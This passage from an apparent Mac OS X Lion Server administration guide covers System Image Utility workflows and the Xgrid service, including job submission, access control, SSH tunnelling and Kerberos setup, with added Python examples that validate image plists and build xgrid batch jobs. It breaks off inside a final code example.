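</plist>
"""

# Key -> Python type expected after plistlib parsing.
REQUIRED_KEYS = {
    "Name": str, "Index": int, "IsEnabled": bool, "IsInstall": bool,
    "Type": str, "RootPath": str, "BootFile": str, "Architectures": list,
}
SINGLE_SERVER_INDEX = range(1, 4096)
LOAD_BALANCED_INDEX = range(4096, 65536)


def validate_nbimageinfo(data, served_by_multiple_servers):
    """Return a list of problems found; an empty list means the image info passed."""
    try:
        info = plistlib.loads(data)
    except Exception as exc:  # malformed XML or binary plist
        return ["not a valid plist: %s" % exc]
    if not isinstance(info, dict):
        return ["top-level plist object is not a dictionary"]

    problems = []
    for key, expected in REQUIRED_KEYS.items():
        if key not in info:
            problems.append("missing key %s" % key)
        elif not isinstance(info[key], expected) or (expected is int and isinstance(info[key], bool)):
            problems.append("key %s has type %s, expected %s"
                            % (key, type(info[key]).__name__, expected.__name__))
    if problems:
        return problems  # type errors make the remaining checks meaningless

    index = info["Index"]
    if served_by_multiple_servers and index not in LOAD_BALANCED_INDEX:
        problems.append("Index %d must be 4096-65535 for an image served by several servers" % index)
    if not served_by_multiple_servers and index not in SINGLE_SERVER_INDEX:
        problems.append("Index %d must be 1-4095 for an image served by one server" % index)
    if info["Type"] not in ("NFS", "HTTP"):
        problems.append("Type %r is not NFS or HTTP" % info["Type"])
    if not info["Architectures"]:
        problems.append("Architectures is empty, so no client would list the image")
    if not info["IsEnabled"]:
        problems.append("IsEnabled is false; clients will not see the image until it is enabled")
    return problems


if __name__ == "__main__":
    for multi in (True, False):
        result = validate_nbimageinfo(SAMPLE_NBIMAGEINFO, multi)
        print("served by several servers=%s: %s" % (multi, result or "OK"))
```

Run it against the NBImageInfo.plist of a real .nbi folder by reading the file in binary mode and passing the bytes, with the second argument reflecting whether the load-balancing checkbox was selected when the image was built; any non-empty result is a reason not to copy the image to the share point yet.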

Workflows

About workflows
System Image Utility harnesses the power of Automator to help you create custom images by assembling workflows. The basic building block of a workflow is an Automator action. You define the image customization by assembling Automator actions into a workflow. Instead of being a do-it-all tool, an action is purpose-designed to perform a single task well. By combining several actions into a workflow, you can quickly accomplish a specific task that no one action can accomplish on its own. Each action performs a single task, such as customizing a software package or adding a user account.

You use workflows to create customized NetInstall or NetBoot images depending on the goals of your task:

- Workflows that create custom NetInstall images assemble an image that installs the OS onto the computer, originating either from installation DVDs or from an installed OS volume. This image boots into the installer environment or a similar shell environment and performs the workflow steps you define.
- Workflows that create custom NetBoot images assemble a bootable image from installation DVDs or from an installed OS volume. This image can be directly installed onto a target volume using the asr command-line tool or NetBoot.

For more information, see Assemble workflows.

Assemble workflows
To assemble a workflow from a set of actions, drag and drop the actions from the Automator Library in the sequence you want them to run. Each action in the workflow corresponds to a step you would otherwise perform manually. Each action has options and settings you can configure. System Image Utility connects these action components with the types of data that flow from one action to another. You can save your assembled workflows to reuse later.

Add workflows
You can update or modify workflows by adding them to System Image Utility.

1. Open System Image Utility.
2. Click the Add button (+) and select Add Existing Workflow.
3. Select the workflow to add to System Image Utility. Workflows have the .workflow file extension.
4. Click Open.

Remove workflows
You can remove workflows from System Image Utility.

1. Log in as an administrator user and open System Image Utility.
2. In the left sidebar, click the triangle next to Workflows. The list of workflows appears.
3. Select the workflow to remove and choose File > Remove Workflow.
4. Click Remove to confirm the action. The workflow is removed from System Image Utility but is not deleted from your computer.

Assemble an image workflow


Use image workflows to create Mac OS X Lion NetBoot and NetInstall images. Workflows let you manually define the contents of your image in System Image Utility. An image workflow must start with the Define Image Source action and end with the Create Image action. Also, actions in a workflow must be connected. If not, the workflow is invalid and the actions are not processed.

1. Log in as an administrator user.
2. Open System Image Utility (in the /Applications/Server/ folder).
3. In the image source list, click the triangle at the left of Sources. The list of sources appears.
4. From the expanded list, select the image source. When you select the source, this action chooses a default image type based on the contents of the selected source.
5. Choose which type of image you are creating (NetInstall, NetBoot, or NetRestore image).
6. Click Customize for advanced image creation options. This opens the workflow pane and Automator Library. The Define Image Source action is present as the first component in the workflow.
7. Configure the Define Image Source action for your image. This action is required at the beginning of all image workflows. See Configure the Define Image Source action.
8. From Automator Library, choose additional actions that your customized image requires and drag them into the Workflow pane between the Define Image Source action and the Create Image action.
9. Assemble the actions in the order you like, configuring each action as you go. For more information on configuring the actions, see About workflows.
10. Add the Create Image action to the end of your workflow. This action is required at the end of image workflows. See Configure the Create Image action.
11. Save the workflow by clicking Save, then enter the name of your workflow in the Save As field and choose where to save the workflow. To save the workflow somewhere else, choose a location from the Where pop-up menu or click the triangle next to the Save As field and navigate to a folder.
12. Click Save.
13. To start the workflow, click Run and authenticate if prompted.

Important: Do not attempt to edit content in the image destination folder while the image is being created.

Use automator to run a workflow


You can use the automator command-line tool to run a workflow.

The following command runs a workflow with somevariable set to somevalue in the myworkflow.workflow file:

$ automator -D somevariable=somevalue myworkflow.workflow

For more information, see the automator man page.

Xgrid

About Xgrid and computational grids


Xgrid makes it easy to turn an ad hoc group of Mac computers into a low-cost supercomputer. Xgrid is ideal for individual researchers, specialized collaborators, and application developers. For example:

- Scientists can search biological databases on a cluster of Xserve systems.
- Engineers can perform finite element analyses on their workgroup's desktops.
- Animators can render images using Mac systems across multiple corporate locations.
- Research teams can enlist colleagues and interested laypeople in Internet-scale volunteer grids to perform long-running scientific calculations.
- Anyone needing to perform CPU-intensive calculations can simultaneously run a single job across multiple computers, dramatically improving throughput and responsiveness.

With Xgrid functionality integrated into Lion Server, system administrators can quickly enable Xgrid on Macs throughout their company, turning idle CPU cycles into a productive cluster at no incremental cost. Many desktop computers sit idle during the day, in the evening, and on weekends. The assembly of these systems into a computational grid is known as desktop recovery. This method of grid construction enables you to vastly improve your computational capacity without purchasing extra hardware, and Xgrid makes the software configuration a straightforward task.

For a server to function as a controller, Xgrid requires Mac OS X Server v10.4 with a minimum of 256 MB of RAM, or Mac OS X Server v10.5 or later with 1 GB of RAM. To operate as an agent in a grid, Xgrid requires Mac OS X v10.3 or later with a minimum of 128 MB of RAM (256 MB advisable), or Mac OS X v10.4 or later with 512 MB of RAM. All Xgrid participants must have a network connection. As always, the more RAM a system has, the better it performs, especially for high-performance computing applications.

A grid is a group of computers working together to solve a single problem. The systems in a grid can be loosely coupled, geographically dispersed and, to some extent, heterogeneous. In contrast, systems in a cluster are often homogeneous, colocated, and strictly managed. Highly dispersed grids, such as SETI@Home, enable individuals to donate their spare processor cycles to a cause. In office environments, large rendering or simulation jobs can be distributed across systems left idle overnight. These can even be used to augment a dedicated computational cluster, which is available to Xgrid clients at all times.

Xgrid has no limitations on the amount of computational power it can support. The performance of the grid depends on the systems participating, the software running, and the network, among other factors. However, individual applications strongly influence the performance of the grid. You determine if an application is improved by being deployed on a computational grid. In the best case, application performance might scale linearly with the size of the grid. In the worst case, the addition of agents to a grid can cause a job to be completed in even more time than if there were fewer agents. (In such a situation, tasks become so small that the overhead associated with distributing the increased number of tasks supersedes the performance gain of using more agents.) Be aware of these considerations.

Many proprietary projects enable you to participate in a large computational grid. Often these projects, such as SETI@Home and FightAIDS@Home, are tied to a specific scientific purpose. They usually have easy-to-install software that enables any volunteer to participate in that project, and they frequently take the form of a screen saver or background process.

You don't need to think in terms of thousands or millions of seldom-used computers to see the significance of a computational grid. For example, computers used by university students or corporate employees often work fewer hours than the hours they sit idle at night or on weekends. These computers could contribute productively to the work of a grid without diminishing their usefulness to the students or employees.

Other grid projects are designed for large-scale computational grids, such as the Globus Alliance (a group founded by universities and researchers), with flexible resource management tools and more intelligent grid deployment methods. Instead of developing neatly packaged applications for a specific grid, such projects provide comprehensive frameworks for application deployment.

Xgrid enables users to participate in a computational grid of their choice while still providing the flexibility of a more generic framework for grid developers when deploying grid applications. Xgrid provides the primary benefits of both:

- Easy grid configuration and deployment
- Straightforward yet flexible job submission
- Automatic controller discovery by agents and clients
- Flexible architecture based on open standards
- Support for the UNIX security model, including Kerberos single sign-on or regular password authentication
- Choice between a command-line interface or an API-based model for grid interaction

Common types of grids and grid computing styles

Xgrid can be used in tightly coupled clusters, worldwide grids, and everything in between. This immense flexibility enables you to deploy grids of almost any nature. Three topologies are commonly used for Xgrid deployments.

Xgrid clusters
Computational clusters are sets of systems dedicated to computation. In a cluster, systems are typically colocated in a rack, connected using gigabit Ethernet or another high-performance network, and strictly managed for maximum performance. Cluster systems are often entirely homogeneous: their operating systems are the same versions, they have the same software installed, and they generally have the same processor, disk, and RAM configurations. Xgrid enables administrators to easily configure the distributed resource management functionality of the cluster. Each server in the system runs the agent software, and the head node in the cluster runs the controller software. Xgrid distributes tasks across the cluster. In clusters, failure rates are generally very low. Systems are rarely, if ever, offline, and their resources are not shared with general user tasks. Clusters are the most efficient but most expensive model of distributed computing.

Local grids
Systems that are under common administration in a company, university computer lab, or other managed environment can often be easily assembled into a grid for desktop recovery. These systems are often on a local area network (LAN) and they are generally managed by a single organization. As a result, they provide good network performance and offer substantial manageability. Because these systems are often also used as day-to-day workstations, users can easily interrupt grid tasks by moving the mouse, resetting the system, or even accidentally disconnecting the system from the network. In such cases, a task might fail as part of an Xgrid job. The Xgrid controller eventually reassigns the failed task to another agent, and the job completes successfully. In local grids, performance is limited by such situations and by the varying performance of any given agent on the grid.

Distributed grids
When a system is permitted to donate its time, a distributed grid is formed. The Xgrid agent enables a user to specify any IP address or host name for its controller. By specifying a grid, a user can dedicate his or her CPU time to that grid no matter where the controller is located. The manager of the controller has no direct management control or knowledge of the agent system but is nonetheless able to harness its CPU time. Distributed grids have very high failure rates for jobs but place a very low burden on the grid administrator. With very large jobs, high task failure rates might not substantially affect the performance of the grid if failed tasks can be rapidly reassigned to other available agents. Network performance can also be a consideration because data is sent over the Internet, rather than over a local network, to agents connected to a grid. The monetary cost of such distributed grids is extremely low.

Xgrid components
The Xgrid three-tier architecture simplifies the distribution of complicated tasks. Its user clients, grid controllers, and computational agents work together to streamline the process of assembling nodes, submitting jobs, and retrieving results. The primary components of a computational grid perform the following functions:

- An agent runs one task at a time per CPU; therefore, a multiprocessor computer can run multiple tasks simultaneously.
- A controller queues tasks, distributes those tasks to agents, and handles task reassignment.
- A client submits jobs to the Xgrid controller in the form of multiple tasks. (A client can be any computer running Mac OS X v10.4 or later or Mac OS X Server v10.4 or later.)

In principle, the agent, controller, and client can run on the same server, but it is often more efficient to have a dedicated controller node.

Client
Any system can be an Xgrid client if it is running Mac OS X v10.4 or later and has a network connection to the Xgrid controller system. In general, the client can connect to only a single controller. Depending on how a controller is configured, the client must supply a password or be authenticated by Kerberos (single sign-on) before submitting a job to the grid. A user submits a job to the controller from a system running the Xgrid client software, usually a command-line tool accessed with the Terminal application. The job can specify the controller or use multicast DNS (mDNS) to dynamically discover the first available controller. When the job is complete, the controller notifies the client and the client can retrieve the results of the job.

Controller
The Xgrid controller manages communications among the computational resources of a grid. The controller requires Mac OS X Server v10.4 or later. The controller accepts network connections from clients and agents. It receives job submissions from clients, divides the jobs into tasks, dispatches tasks to agents, and returns results to clients. Although there can be more than one Xgrid controller running on a subnet, there can be only one controller per logical grid. Each controller can have an arbitrary number of agents connected, but Apple has tested 128 agents per controller. There is no software limitation on the number of agents, and users of Xgrid can choose to exceed 128 agents on a controller at their own risk, with a theoretical maximum equal to the number of available sockets on the controller system.

Agent
Xgrid agents run the computational tasks of a job. In Lion Server, the agent is turned off by default. When an agent is turned on and becomes active at startup, it registers with a controller. (An agent can be connected to only one controller at a time.) The controller sends instructions and data to the agent as needed for the controller's jobs. After it receives instructions from the controller, the agent performs its assigned tasks and sends the results back to the controller.

By default, agents seek to bind to the first available controller on the LAN. Alternatively, you can specify that an agent bind to a specific controller. Because an agent that binds to the first available controller runs whatever tasks that controller sends, require password or Kerberos authentication or pin the agent to a known controller on networks you do not fully control. You can also specify whether an agent is always available or is available only when the computer is idle. A computer is considered idle when it has had no mouse or keyboard input; CPU and network activity are not taken into account. If a user returns to a computer that is running a grid task, the computer continues to run the task until it is finished. By default, the agent on a Mac server is dedicated, and the agent on a Mac OS X computer (not a server) is configured to accept tasks only when the computer has had no user input for 15 minutes.

Requirements and capacities


Xgrid can scale from small clusters of a few computers up to large organization-wide grids. Xgrid supports up to 128 agents, any number of jobs comprising up to 100,000 queued tasks, up to 128 MB of submitted data per job, and up to 128 MB of results per job. These are recommended limits and are not enforced by the software. You may choose to exceed these limits at your own risk.

Set up Xgrid

Configure Xgrid service


Plan your grid and set up the Xgrid agent and controller. Xgrid simplifies deployment and management of computational grids.

Using Server Admin you can configure Xgrid to set up computer groups (grids or clusters) and allow users to easily submit complex computations to these grids (local, remote, or both), as an ad hoc grid or a centrally managed cluster.

Setup overview

Here is an overview of the steps for setting up the Xgrid service:

1. Identify the Xgrid environment you need. Before configuring Xgrid, you must define the grid environment you'll create. In particular, you must decide the kind of authentication to use (see Authentication methods for Xgrid), where to host your controller (see Host the grid controller), and how you will manage the controller (see Manage Xgrid and Monitor grid activity).
2. Prior to configuring, enable Xgrid service. See Enable Xgrid service.
3. Optionally, configure Xgrid using the Xgrid service configuration assistant. This assistant helps with Xgrid configuration by automating many settings. See Configure Xgrid with the Xgrid service configuration assistant.
4. Configure your server as an Xgrid controller using Server Admin. See Configure controller settings.
5. Start Xgrid on the server using Server Admin. See Start Xgrid.
6. Configure your server as an Xgrid agent. See Configure an Xgrid agent (server).
7. Configure your Mac OS X computers as Xgrid agents. See Configure an Xgrid agent (Lion client).
8. Determine and implement a plan for redundancy. See About Xgrid redundancy and Set up Xgrid redundancy.

Use Xgrid from the command line


Learn how to use Xgrid command-line tools and the Terminal application to submit jobs to a grid and to get information about jobs. After you configure an Xgrid controller and add agents to a grid, you use the Terminal application to send a job to the grid.

Structure jobs for Xgrid

Carefully planning and structuring a job can result in efficient use of the grid. For example, the best structure for a job that requires multiple searches of a large database might be to divide the database into multiple sections and provide a section to each agent in the grid.

About job styles

Different styles of jobs often require different handling. Similarly, the way a job is structured influences how efficiently the grid completes it. Consider the following job styles:

- Everything is in one single large job, with numerous small tasks.
- Everything is divided into medium-sized jobs, where each job has roughly as many tasks as there are nodes in the grid. (This type of job is usually created by a meta job script, which divides the job into smaller chunks, each of which is a job.)
- An entire workflow is composed of several interrelated jobs.

Deciding how to structure a job can involve experimentation to discover the best way to complete it. For example, you might create a simple, small version of a job in two styles, such as by placing all tasks in one job or by subdividing the job into multiple tiny jobs. Running both experimental jobs under similar conditions in the grid will give you a good idea of which job style is better suited to those conditions.

About job failure

Xgrid jobs can rely on message-passing interface (MPI) APIs. For jobs that rely on MPI, if a single task fails, the entire job fails and must be resubmitted. Therefore do not use MPI-based jobs on grids with high task-failure rates. Jobs that are more parallel in nature are generally unaffected by occasional task failures. Tasks are typically reassigned to other available agents to complete the job. Most jobs fall into this category.

Submit a job

You submit jobs to a grid using the command-line tool and Terminal. Example code is available on the Apple developer website (developer.apple.com) for alternative methods of submitting jobs. Also, if you have Developer Tools installed, you can view the examples located in /Developer/Examples/Xgrid/.

When you submit a job to a grid, make sure you use a universal binary. This assures that your job has the correct architecture no matter what architecture the grid agents provide. Also, make sure you set your deployment target correctly. For example, if you are building a tool for Mac OS X v10.6, you must build with Mac OS X v10.6 as your deployment target.

For more information about the syntax and options for the Xgrid command-line tool, see the xgrid man page.

Some developers and organizations offer specialized applications for submitting jobs to a grid. Or you can create an application using Apple's developer tools for Xgrid. When determining whether to use the xgrid command-line tool or another method for submitting jobs, consider these points:

- If the job is simple, use the command-line tool.
- If you use a shell script, use the command-line tool.
- If you want to use Xgrid as part of an application with a graphical user interface (GUI), use the Xgrid API to create the GUI or incorporate it in an existing application. For more information about the API, see Xgrid Reference at developer.apple.com/documentation/.

Examples of Xgrid job submission and results retrieval

The following Terminal commands are examples of jobs a client can submit to the controller.

$ xgrid -h <controller> -p <password> -job submit /bin/echo "Hello, World!"

This job runs /bin/echo on the controller and agent systems with the "Hello, World!" parameter.

$ xgrid -h <controller> -p <password> -job results -id <id>

This command shows the results of the job with the ID indicated.

For an executable shell script named hello.sh:

#!/bin/sh
/bin/echo "Hello, World!"

The following command copies the shell script hello.sh to the Xgrid controller and agent systems and runs the script. /bin/echo must be installed on the agent systems, and hello.sh must have its executable bit set before it can execute.

$ xgrid -h <controller> -p <password> -job submit hello.sh

A password given with -p is visible to other local users in the process list and may be recorded in the shell history. Where the controller is configured for Kerberos single sign-on, authenticate that way instead of passing a password on the command line.
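The "one section of the database per agent" structure described under Structure jobs for Xgrid is easier to get right when a script generates the job rather than a person typing one submission per chunk. The following Python script is an added example, not code from this guide or from Apple: it splits a constructed list of record identifiers into at most one task per agent and writes a batch file for the xgrid tool. It assumes the batch plist layout accepted by xgrid's batch submission mode as documented in the xgrid man page (a top-level jobSpecification dictionary containing name and taskSpecifications, each task carrying command and arguments); confirm those keys against man xgrid on your controller before relying on them. The command path /usr/local/bin/search-chunk is a placeholder for your own universal binary, and the records are constructed for the example.

```python
"""Generate an xgrid batch file with one independent task per agent.

Added example (not Apple's code). Assumptions, to verify against `man xgrid`:
  * `xgrid -h <controller> -job batch <file.plist>` accepts a plist whose top-level
    key is jobSpecification, containing name and taskSpecifications;
  * each task is a dictionary with command and arguments.
Because the tasks are independent (no MPI, no task dependencies), a task that fails
on one agent can be reassigned by the controller without resubmitting the whole job.
"""
import plistlib

# Constructed sample input: identifiers of database records to search.
SAMPLE_RECORDS = ["rec%03d" % i for i in range(10)]
SEARCH_TOOL = "/usr/local/bin/search-chunk"  # placeholder for your universal binary


def split_into_chunks(items, agent_count):
    """Split items into at most agent_count contiguous chunks of near-equal size.

    Never returns an empty chunk: with fewer items than agents you get one chunk
    per item, which avoids scheduling tasks that would do nothing.
    """
    if agent_count < 1:
        raise ValueError("agent_count must be at least 1")
    if not items:
        return []
    n_chunks = min(agent_count, len(items))
    base, extra = divmod(len(items), n_chunks)
    chunks, start = [], 0
    for i in range(n_chunks):
        end = start + base + (1 if i < extra else 0)  # first `extra` chunks get one more
        chunks.append(list(items[start:end]))
        start = end
    return chunks


def build_batch_job(name, command, records, agent_count):
    """Return the xgrid batch job as a dictionary, one task per chunk of records."""
    task_specs = {}
    for task_id, chunk in enumerate(split_into_chunks(records, agent_count)):
        task_specs[str(task_id)] = {"command": command, "arguments": chunk}
    return {"jobSpecification": {"name": name, "taskSpecifications": task_specs}}


def batch_plist_bytes(job):
    """Serialize the job as an XML plist, ready to save and pass to xgrid -job batch."""
    return plistlib.dumps(job, fmt=plistlib.FMT_XML)


def parse_batch_plist(data):
    """Read a batch plist back (useful for checking a file before submitting it)."""
    return plistlib.loads(data)


if __name__ == "__main__":
    job = build_batch_job("db-search", SEARCH_TOOL, SAMPLE_RECORDS, agent_count=4)
    with open("db-search.plist", "wb") as fh:
        fh.write(batch_plist_bytes(job))
    # Then, from a client: xgrid -h <controller> -job batch db-search.plist
    print("wrote db-search.plist with %d tasks"
          % len(job["jobSpecification"]["taskSpecifications"]))
```

Sizing agent_count to the number of agents you expect to be available gives the medium-sized job style described above; passing a much larger value gives the many-small-tasks style, at the cost of the per-task distribution overhead the guide warns about.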
RELATED INFORMATION

View job status from the command line
Retrieve job results from the command line

Hardware administrative services

Xgrid

Manage Xgrid

Manage a grid using Xgrid Admin


After you set up an Xgrid controller, you can use Xgrid Admin to manage a grid. You can use Xgrid Admin on the server or on a remote computer that is running Mac OS X v10.5 or later. Xgrid Admin is a tool you use to monitor grids and manage agents and jobs. You can add controllers and agents to monitor and specify agents that have not joined a grid. You also use Xgrid Admin to pause, stop, or restart jobs.

You can manage computational grids with Xgrid Admin. A computational grid is a fixed group of agents with a dedicated queue. There can be multiple grids per controller, but an agent can belong to only one grid. You cannot move an agent between grids while a job (or a task) is running.

Use Xgrid Admin

Xgrid Admin enables you to monitor grids and manage agents and jobs. You can:
• Check the status of a grid and its activity, including the number of agents working and available, the processing power in use and available, and the number of jobs running and pending
• Add or remove controllers and grids to manage
• See a list of agents in a grid and the CPU power available and in use for each agent
• Add or remove agents in a grid
• See a list of jobs in a grid, the date and time each job was submitted, its progress, and the active CPU power for the job
• Remove jobs in a grid
• Stop a job in progress
• Restart a job that was stopped or is complete

Xgrid Admin provides controls in its graphical interface and menu commands for all of its options. You can also use the Xgrid command-line tool to perform these tasks.
RELATED INFORMATION
• Manage controllers
• Manage agents
• Manage jobs
• Manage grids
• Status indicators in Xgrid Admin
• Use Xgrid from the command line


Manage client access to Xgrid


Server Admin in Lion Server enables you to configure service access control lists (SACLs), which let you specify which users and groups have access to Xgrid and which administrators can manage it. Using SACLs adds another layer of access control in addition to password and Kerberos authentication. Only users and groups listed in an SACL have access to its corresponding service.

Set Xgrid SACL permissions for users and groups

You use Server Admin to set SACL permissions for users and groups to access Xgrid service.
1. Open Server Admin and connect to the server.
2. Click Settings.
3. Click Access.
4. Click Services.
5. Select the level of restriction you want for the services:
   To restrict access to all services, select For all services.
   To set access permissions for individual services, select For selected services below, then select a service from the Service list.
6. To provide unrestricted access to services, click Allow all users and groups.
7. To restrict access to users and groups:
   Select Allow only users and groups below.
   Click the Add button (+) to open the Users and Groups window.
   Drag users and groups from the Users and Groups window to the list.
8. Click Save.

Set Xgrid SACL permissions for administrators

Use Server Admin to set SACL permissions for administrators to monitor and manage Xgrid.
1. Open Server Admin and connect to the server.
2. Click Settings.
3. Click Access.
4. Click Administrators.
5. Select the level of restriction you want for the services:
   To restrict access to all services, select For all services.
   To set access permissions for individual services, select For selected services below, then select a service from the Service list.
6. Open the Users and Groups window by clicking the Add button (+).
7. From the Users and Groups window, drag users and groups to the list.
8. Set user permissions:
   To grant administrator access, choose Administer from the Permission pop-up menu next to the user name.
   To grant monitoring access, choose Monitor from the Permission pop-up menu next to the user name.
9. Click Save.

Solve Xgrid Problems

If your agents can't connect to the Xgrid controller


If an agent is a server, make sure the agent service is enabled and the Xgrid service is started. The Xgrid controller is the only component of Xgrid that has an open port (port 4111) and requires a firewall opening. This means the Xgrid controller is the only component that advertises on or responds to queries over Bonjour. When enabling the controller, make sure firewall port 4111 is open on your computer's firewall (enabled in the Sharing pane of System Preferences) or your corporate firewall (if accepting agents or clients outside your organization). Agents and clients access the controller through a Bonjour lookup or an explicit hostname/IP address. Then they initiate a connection to the controller over a user port, avoiding the need to perform privileged operations or open the firewall.


Use Xgrid over SSH


You can secure Xgrid using SSH by making a tunnel between specific clients or agents and the controller, or by running over a tunnel as a specific user.

Create an SSH tunnel from the client or agent to the controller

The simplest way to secure Xgrid using SSH is to create a tunnel from the client or the agent to the controller.
1. Create the tunnel:
   $ ssh user@controller.hostname.com -L 4111:controller.hostname.com:4111
2. Have the agent or client connect to localhost instead of the controller.

By doing this, SSH tunnels to the remote connection. You can use other ports on the local machine and even tunnel through an intermediary host.

To run an Xgrid agent over an SSH tunnel as a specific user

Using Terminal, enter the following:

$ ssh -R 20000:192.168.1.100:4111 user@192.168.1.102 /usr/libexec/xgrid/GridAgent -ServiceName localhost:20000 -RequireControllerPassword NO -UsesRendezvous NO -OnlyWhenIdle NO -BindToFirstAvailable NO

20000 is the port to tunnel through the ssh connection, 192.168.1.100:4111 is the address and port number of the controller, user is the name of the user to connect as, and 192.168.1.102 is the address of the remote computer that runs the agent.


If you run tasks on multi-CPU computers


By default, each Xgrid agent (one per machine) accepts as many tasks as there are CPUs on that host, as reported by $ sysctl hw.ncpu. Agents assume that tasks are single-threaded, so they run two tasks to make best use of a dual-CPU system. To run multithreaded tasks that take up both CPUs, edit the agent configuration file /Library/Preferences/com.apple.xgrid.agent.plist. To make it always accept only a single task, change the MaximumTaskCount line to MaximumTaskCount=1.

Note: This must be done explicitly for each agent, and is permanent until reversed. You can't specify this kind of constraint as part of a job submission.
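To apply the MaximumTaskCount change above from a script rather than by hand, here is an added example (not Apple's code) that reads and rewrites the agent plist with Python's plistlib; the path is the one named above, and os.cpu_count() stands in for sysctl hw.ncpu so the default can be computed anywhere:

```python
# Added example (not from the Apple manual): inspect and adjust the per-agent
# MaximumTaskCount setting in the Xgrid agent preferences with plistlib.
# AGENT_PLIST is the path the manual names; the default task count follows
# the manual's rule (one task per CPU), with os.cpu_count() standing in for
# `sysctl hw.ncpu` so the code also runs off a Mac.
import os
import plistlib
import tempfile
from pathlib import Path

AGENT_PLIST = Path("/Library/Preferences/com.apple.xgrid.agent.plist")


def default_task_count() -> int:
    """Tasks an agent accepts when MaximumTaskCount is unset: one per CPU."""
    return os.cpu_count() or 1


def read_agent_prefs(path: Path) -> dict:
    """Load the agent plist, or return an empty dict if it does not exist yet."""
    if not path.exists():
        return {}
    with path.open("rb") as fh:
        return plistlib.load(fh)


def effective_task_count(path: Path) -> int:
    """Concurrent tasks this agent will accept (an explicit setting wins)."""
    prefs = read_agent_prefs(path)
    return int(prefs.get("MaximumTaskCount", default_task_count()))


def set_maximum_task_count(path: Path, count: int) -> int:
    """Persist MaximumTaskCount (use 1 for tasks that use every CPU themselves).
    Other keys already in the plist are preserved. Returns the value in effect."""
    if count < 1:
        raise ValueError("MaximumTaskCount must be at least 1")
    prefs = read_agent_prefs(path)
    prefs["MaximumTaskCount"] = count
    with path.open("wb") as fh:
        plistlib.dump(prefs, fh, fmt=plistlib.FMT_XML)
    return effective_task_count(path)


if __name__ == "__main__":
    # Constructed sample: work on a scratch copy, not the live agent file.
    # On a real agent, run this against AGENT_PLIST as an administrator.
    scratch = Path(tempfile.mkdtemp()) / "com.apple.xgrid.agent.plist"
    print("default:", effective_task_count(scratch))
    print("after set:", set_maximum_task_count(scratch, 1))
```

Remember that this edits one agent only; repeat it on every agent that should run single-task, as the note above says.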


If you submit a large number of jobs


GridStuffer is a third-party Cocoa application created by Charles Parnot of Stanford to manage multitask jobs. It provides a friendly GUI for many common Xgrid tasks. GridStuffer is available at http://cmgm.stanford.edu/~cparnot/xgrid-stanford/html/goodies/GridStuffer-info.html. A companion command-line tool, xgridstatus, provides an easy way to retrieve information about your grid and jobs. xgridstatus is available at http://cmgm.stanford.edu/~cparnot/xgrid-stanford/html/goodies/xgridstatus-info.html.


If you want to use Xgrid on other platforms


Third-party agents are available that run Xgrid jobs on non-Mac platforms. You are responsible for ensuring that your tasks contain and call relevant platform-specific code. There is no intrinsic support for heterogeneous execution, although there is nothing that relies on Mac-specific technology. The primary technical requirement is a sufficiently functional BEEP protocol stack. Several open source implementations are available, of varying quality. You can download Curtis Campbell's cross-platform Java-based Xgrid agent at sourceforge.net/projects/xgridagent-java/.


If the Xgrid controller must be restarted


When the Xgrid controller is restarted by Server Admin, the xgridctl tool, a power outage, or a kernel panic, the following occurs:
• Clients and agents are disconnected.
• Tasks running when the controller restarted are stopped.
• Partial data from killed tasks is discarded. (Data from finished tasks is saved and can be retrieved as usual.)
• Queued jobs and tasks are saved and run as usual.
• Tasks are started or restarted as agents reconnect and become available.


If Xgrid has crashed


The Xgrid controller and agent should restart automatically if they crash. CrashReporter logs can be found in /Library/Logs/CrashReporter. Xgrid logs notices, warnings, and errors to the console as well as to log files in /Library/Logs/Xgrid.


If you are trying to submit jobs over 2 GB


The Xgrid controller is a 32-bit process and keeps most job input and output data in memory. This means that the controller can crash if your jobs require a large amount of input or produce a large amount of output. You can use a shared filesystem (such as Xsan or NFS) to share large amounts of data between distributed processes.


If you want to enable Kerberos/SSO for Xgrid


For Xgrid to use SSO, you need the following:
• The agent must have the host's user principal in the system keytab.
• The Kerberos database on the Kerberos domain controller must contain the agent's principal.
• The controller's realm must be the default realm on the agent computer.

The agent's principal is created in the Kerberos domain controller and is put in the agent's keytab if the agent computer is bound to the OD master using authenticated binding with Directory access. Otherwise, you must use kadmin to create the principal in the Kerberos domain controller and export it to the keytab.

For example, the computer hosting the agent must have the host's user principal in the system keytab, as shown here:

hostname:~ user$ sudo klist -k
Password:
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------
   1 hostname.apple.com@XGRIDTEST.APPLE.COM
   1 hostname.apple.com@XGRIDTEST.APPLE.COM
   1 hostname.apple.com@XGRIDTEST.APPLE.COM

The Kerberos database on the KDC must contain the agent's principal, as in the following:

$ sudo kadmin.local -q "get_principal hostname.apple.com"
Authenticating as principal root/admin@XGRIDTEST.APPLE.COM with password.
Principal: hostname.apple.com@XGRIDTEST.APPLE.COM
Expiration date: [never]
Last password change: Tue Apr 12 17:46:41 PDT 2005
Password expiration date: [none]
Maximum ticket life: 0 days 10:00:00
Maximum renewable life: 7 days 00:00:00
Last modified: Tue Apr 12 17:46:41 PDT 2005 (root/admin@XGRIDTEST.APPLE.COM)
Last successful authentication: [never]
Last failed authentication: [never]
Failed password attempts: 0
Number of keys: 4
Key: vno 1, Triple DES cbc mode with HMAC/sha1, no salt
Key: vno 1, ArcFour with HMAC/md5, no salt
Key: vno 1, DES cbc mode with CRC-32, no salt
Key: vno 1, DES cbc mode with CRC-32, Version 4
Attributes: REQUIRES_PRE_AUTH
Policy: [none]

The controller's realm must be the default realm on the agent computer, as shown:

$ cat /Library/Preferences/edu.mit.Kerberos
# WARNING This file is automatically created, if you wish to make changes
# delete the next two lines
# autogenerated from : /LDAPv3/xgridtest.apple.com
# generation_id : 1637891359
[libdefaults]
    default_realm = XGRIDTEST.APPLE.COM
[realms]
    XGRIDTEST.APPLE.COM = {
        kdc = xgridtest.apple.com
        admin_server = xgridtest.apple.com
    }
[domain_realm]
    apple.com = XGRIDTEST.APPLE.COM
    .apple.com = XGRIDTEST.APPLE.COM
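A pre-flight check for the two agent-side prerequisites above (host principal in the keytab, controller realm set as the default realm), written here as an added example rather than Apple's code; the klist output and Kerberos file text are constructed from the listings above, and the controller's realm is supplied by the caller:

```python
# Added example, not Apple's code: check two of the agent-side SSO
# prerequisites from captured `klist -k` output and the agent's
# /Library/Preferences/edu.mit.Kerberos file. Sample text is constructed
# from the manual's listings; the controller realm comes from the caller.
import re
from typing import Dict, List

KLIST_OUTPUT = """\
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- ----------------------------------------
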